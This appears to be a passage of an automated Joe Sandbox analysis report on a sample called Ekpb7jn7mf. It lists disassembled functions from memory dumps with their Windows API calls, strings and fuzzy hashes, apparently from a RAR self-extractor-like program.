                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                  • Instruction ID: c15cfc9666c55ee16b299cdb4da1d8098bcf5086a197abf0b6f4b7cdc462828e
                                                                                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                  • Instruction Fuzzy Hash: DBC1A173D4BAB30A8735812D84685ABEE62AFD174031FC3E2CCD42F389D63A5C9596D4
                                                                                  Function 004143B9 Relevance: .2, Instructions: 236COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bc5db6375299f5fb5f48be1a8dce18ece300ae267d3dd08f037fad015009b244
                                                                                  • Instruction ID: b9e0218a5a86b8666fb99ade57d63a16e73d5bca7fd447a2b6a82eceb0b6eb70
                                                                                  • Opcode Fuzzy Hash: bc5db6375299f5fb5f48be1a8dce18ece300ae267d3dd08f037fad015009b244
                                                                                  • Instruction Fuzzy Hash: 20812571600249ABDB14DE58C5D0BFD73A6EB91318F20842FEE569B282C77CE9C1CB59
                                                                                  Function 0040C9D5 Relevance: .2, Instructions: 231COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ea7d4c7575f7bca0de84042ea1bf0bce496858f6de31adbbb22c764affaac377
                                                                                  • Instruction ID: 0b3c60d654e4039264336fdf6088c722dab3ce1366e61befc4455aacdbc13535
                                                                                  • Opcode Fuzzy Hash: ea7d4c7575f7bca0de84042ea1bf0bce496858f6de31adbbb22c764affaac377
                                                                                  • Instruction Fuzzy Hash: 96C161B4C185D99ECF02DFA9D4A09FEBFF4AF1A240B0910DAE9D5A7252D2349710DF24
                                                                                  Function 0040C608 Relevance: .2, Instructions: 195COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ebaf950f54676bac682397af9a5d3b187086251eced4c07a08f3567b9e8006e1
                                                                                  • Instruction ID: a2973edb2dad714e7df643b0271f3bbce556e831f120983fa6fe34d6b1a57c16
                                                                                  • Opcode Fuzzy Hash: ebaf950f54676bac682397af9a5d3b187086251eced4c07a08f3567b9e8006e1
                                                                                  • Instruction Fuzzy Hash: B581E65620E2E18EE71AC73814D96F63FD11FB2101B2DA2EEC4CD4F2C7D6660519D729
                                                                                  Function 0041429D Relevance: .1, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fbcf4bf412d83560e8a03d4e51c195a15b9a53bbb05448f9cbeabe379a3aaaa5
                                                                                  • Instruction ID: 4aa0259d5d73a504087fc24dc91421ddc6118a80cc820f17b498af7ff1261b7f
                                                                                  • Opcode Fuzzy Hash: fbcf4bf412d83560e8a03d4e51c195a15b9a53bbb05448f9cbeabe379a3aaaa5
                                                                                  • Instruction Fuzzy Hash: 11311871A00659ABCB00DF78C4912DDB7E1EF92308F14856EE8A5DB382D279E945CB84
                                                                                  Function 00405608 Relevance: .1, Instructions: 73COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed9068bfa639142bf8b4c38fd82cdfd16adbe522c08585add70b4bf8b4f81ab1
                                                                                  • Instruction ID: c489d99020a4490983b10f2649203983af3b79522229694849d3a5f5a10aa2b5
                                                                                  • Opcode Fuzzy Hash: ed9068bfa639142bf8b4c38fd82cdfd16adbe522c08585add70b4bf8b4f81ab1
                                                                                  • Instruction Fuzzy Hash: 8021C6729106716BD704CE69AC9412733A2D7CA3217DA4237DF846B3A5C2357522CAE8
                                                                                  Function 0040A77B Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 139COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy_wcslen_wcsncpy
                                                                                  • String ID: UNC$\\?\
                                                                                  • API String ID: 677062453-253988292
                                                                                  • Opcode ID: 100efcca70741f59cb8f73d59639ec48dc335179b439b8c31939f165d411108a
                                                                                  • Instruction ID: 5adcfd6603d7281c4640a6c3627d82dea74def8de4f5e81170b7b1c7164785d0
                                                                                  • Opcode Fuzzy Hash: 100efcca70741f59cb8f73d59639ec48dc335179b439b8c31939f165d411108a
                                                                                  • Instruction Fuzzy Hash: 4D41F9B2A40304B6CB20BA518C45EEB33696F45748F19443FFA4477182E77C96A186AF
                                                                                  Function 004194EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 125memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00419514
                                                                                  • _malloc.LIBCMT ref: 00419521
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • _wcscpy.LIBCMT ref: 0041953A
                                                                                  • _wcscat.LIBCMT ref: 00419545
                                                                                  • _wcscat.LIBCMT ref: 00419550
                                                                                  • _wcscat.LIBCMT ref: 0041958B
                                                                                  • _wcscat.LIBCMT ref: 0041959C
                                                                                  • _wcslen.LIBCMT ref: 004195B5
                                                                                  • GlobalAlloc.KERNEL32(00000040,-00000009,?,<html>,00000006), ref: 004195C6
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000106,00000000,00000000), ref: 004195E7
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 0041960F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$Global_wcslen$AllocAllocateByteCharCreateHeapMultiStreamWide_malloc_wcscpy
                                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                  • API String ID: 4158105118-4209811716
                                                                                  • Opcode ID: 094548c340a6c7a3b8b77f4710af8c0ccba77d5e9c3a63f69f96a657ba005cf9
                                                                                  • Instruction ID: 11fdc154705fa1265123fb9ff1eccb2a049f9cc5486916b8e4ddd2d18f464033
                                                                                  • Opcode Fuzzy Hash: 094548c340a6c7a3b8b77f4710af8c0ccba77d5e9c3a63f69f96a657ba005cf9
                                                                                  • Instruction Fuzzy Hash: 4F314B32905200BBCB21AB619C81EEF37799F41324F14409FF815AB2C2DB3D9E91876D
                                                                                  Function 00419812 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000000,00000000,?,?), ref: 0041982C
                                                                                    • Part of subcall function 004197AB: LoadCursorW.USER32(00000000,00007F00), ref: 004197E2
                                                                                    • Part of subcall function 004197AB: RegisterClassExW.USER32(00000030), ref: 00419803
                                                                                  • GetWindowRect.USER32(?,?), ref: 0041984D
                                                                                  • GetParent.USER32(?), ref: 00419860
                                                                                  • MapWindowPoints.USER32(00000000,00000000), ref: 00419865
                                                                                  • DestroyWindow.USER32(?), ref: 00419873
                                                                                  • GetParent.USER32(?), ref: 00419891
                                                                                  • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 004198B0
                                                                                  • ShowWindow.USER32(?,00000005,?), ref: 004198E2
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004198EC
                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00419902
                                                                                  • UpdateWindow.USER32(?), ref: 0041990B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
                                                                                  • String ID: RarHtmlClassName
                                                                                  • API String ID: 3841971108-1658105358
                                                                                  • Opcode ID: d7e2d38c53ea50d8d6f2b087bcee56e4380f1a53bbbe24c4848b2102da79a821
                                                                                  • Instruction ID: 18a454af694ecf558c9de2c3b9fe70b0a29876972dccec8d3d2db288ca25061c
                                                                                  • Opcode Fuzzy Hash: d7e2d38c53ea50d8d6f2b087bcee56e4380f1a53bbbe24c4848b2102da79a821
                                                                                  • Instruction Fuzzy Hash: 4A319A71600604EFCB319FA4CC48AAFBBB9FF48710F10452AF85692361D735AD91CBA9
                                                                                  Function 0040515C Relevance: 21.1, APIs: 14, Instructions: 91COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcscpy.LIBCMT ref: 0040517A
                                                                                  • _wcslen.LIBCMT ref: 00405182
                                                                                  • _wcscpy.LIBCMT ref: 00405192
                                                                                  • _wcslen.LIBCMT ref: 00405198
                                                                                  • _wcscpy.LIBCMT ref: 004051B0
                                                                                  • _wcslen.LIBCMT ref: 004051B6
                                                                                  • _wcscpy.LIBCMT ref: 004051C5
                                                                                  • _wcslen.LIBCMT ref: 004051CB
                                                                                  • _memset.LIBCMT ref: 004051E0
                                                                                  • GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 0040522C
                                                                                  • GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405234
                                                                                  • CommDlgExtendedError.COMDLG32(?,?,?,?,?,000000A2), ref: 0040523C
                                                                                  • GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405258
                                                                                  • GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405260
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileName_wcscpy_wcslen$OpenSave$CommErrorExtended_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3496903968-0
                                                                                  • Opcode ID: a5faa8c4c69004b7bb5267c6c72b3ff1a4d2df59c7eb0ab7550321787e94547b
                                                                                  • Instruction ID: 55bf67cc7318731f0be5ec7d78ee7543e3385b57d9dccdff966e71b7230244cc
                                                                                  • Opcode Fuzzy Hash: a5faa8c4c69004b7bb5267c6c72b3ff1a4d2df59c7eb0ab7550321787e94547b
                                                                                  • Instruction Fuzzy Hash: AD31A871905614ABCF11EFA5DC49ACF7BB8EF04354F10042BF905B7241DB3899958FAA
                                                                                  Function 00419A80 Relevance: 19.6, APIs: 13, Instructions: 75windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00419A8C
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00419A9C
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00419AA3
                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00419AB1
                                                                                  • CreateCompatibleBitmap.GDI32(?,00000200,00419C32), ref: 00419AD3
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00419AE6
                                                                                  • SelectObject.GDI32(?,00000200), ref: 00419AF1
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,00000200,00419C32,00000000,00000000,00000000,?,?,00CC0020), ref: 00419B0F
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00419B19
                                                                                  • SelectObject.GDI32(?,00419C32), ref: 00419B21
                                                                                  • DeleteDC.GDI32(00000000), ref: 00419B2A
                                                                                  • DeleteDC.GDI32(?), ref: 00419B2F
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00419B35
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                  • String ID:
                                                                                  • API String ID: 3950507155-0
                                                                                  • Opcode ID: 645663dba6679b36ad936e8b2df9ede2b2f8713d484d9860903d99ab566a2af6
                                                                                  • Instruction ID: 119e2cb59528a0c7d7cd872958e0e9ee33bbab5a20e852a649a5765f6f8a0c9b
                                                                                  • Opcode Fuzzy Hash: 645663dba6679b36ad936e8b2df9ede2b2f8713d484d9860903d99ab566a2af6
                                                                                  • Instruction Fuzzy Hash: 7D21A376900258FFCF129FA1CC48DEEBFB9FB49350B104466F914A2120C7369A65EFA4
                                                                                  Function 0041E604 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D828,0000000C,0041E73F,00000000,00000000,?,0041FC28,0041A72A,00000456,?,?,0041A72A,00000000,?), ref: 0041E616
                                                                                  • __crt_waiting_on_module_handle.LIBCMT ref: 0041E621
                                                                                    • Part of subcall function 00421215: Sleep.KERNEL32(000003E8,00000000,?,0041E567,KERNEL32.DLL,?,0041E5B3,?,0041FC28,0041A72A,00000456,?,?,0041A72A,00000000,?), ref: 00421221
                                                                                    • Part of subcall function 00421215: GetModuleHandleW.KERNEL32(00000000,?,0041E567,KERNEL32.DLL,?,0041E5B3,?,0041FC28,0041A72A,00000456,?,?,0041A72A,00000000,?), ref: 0042122A
                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041E64A
                                                                                  • GetProcAddress.KERNEL32(0041A72A,DecodePointer), ref: 0041E65A
                                                                                  • __lock.LIBCMT ref: 0041E67C
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0041E689
                                                                                  • __lock.LIBCMT ref: 0041E69D
                                                                                  • ___addlocaleref.LIBCMT ref: 0041E6BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                  • API String ID: 1028249917-2843748187
                                                                                  • Opcode ID: 9635beca641f941a5cf41b771aad4b1ee68b70dcc45c0ba52da07d90b48f8134
                                                                                  • Instruction ID: 4acc287862233ff18776b049d6808c76d8f0a9d559ad4d14c80fa06a5396db16
                                                                                  • Opcode Fuzzy Hash: 9635beca641f941a5cf41b771aad4b1ee68b70dcc45c0ba52da07d90b48f8134
                                                                                  • Instruction Fuzzy Hash: 6611C671A00701DFD720AF269805B9AB7F0AF14314FD0456FE8A9972A0CB7895418F5D
                                                                                  Function 0040EF6B Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$ChangeNotify_wcschr_wcsncpy
                                                                                  • String ID: "$.lnk
                                                                                  • API String ID: 1911921660-4024015082
                                                                                  • Opcode ID: bb0bb07d20d58bc274e12b24089ba0bdb5e5ebd778e433f1e53f3b196b6d260a
                                                                                  • Instruction ID: 278b349919d3cb1b668631eb1181db1a3f53cfa3356272b2b6a730d4ec44b6fe
                                                                                  • Opcode Fuzzy Hash: bb0bb07d20d58bc274e12b24089ba0bdb5e5ebd778e433f1e53f3b196b6d260a
                                                                                  • Instruction Fuzzy Hash: 909186729042289ADF35DBA1CC45EEE73BCBB04304F4445BBE109F7081EB789AD88B55
                                                                                  Function 0040ED72 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(?,?), ref: 0040ED8F
                                                                                    • Part of subcall function 0040A00A: _wcslen.LIBCMT ref: 0040A010
                                                                                    • Part of subcall function 0040A00A: _wcscat.LIBCMT ref: 0040A02F
                                                                                  • _swprintf.LIBCMT ref: 0040EDCB
                                                                                    • Part of subcall function 00401B74: __vswprintf_c_l.LIBCMT ref: 00401B87
                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0040EDED
                                                                                  • _wcschr.LIBCMT ref: 0040EE20
                                                                                  • _wcscpy.LIBCMT ref: 0040EE64
                                                                                  • _wcscpy.LIBCMT ref: 0040EE8D
                                                                                  • _wcscpy.LIBCMT ref: 0040EEA0
                                                                                  • MessageBoxW.USER32(?,00000000,00000000,00000024), ref: 0040EED0
                                                                                  • EndDialog.USER32(?,00000001), ref: 0040EEF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$DialogItemMessagePathTempText__vswprintf_c_l_swprintf_wcscat_wcschr_wcslen
                                                                                  • String ID: %s%s%d
                                                                                  • API String ID: 1897388972-1000756122
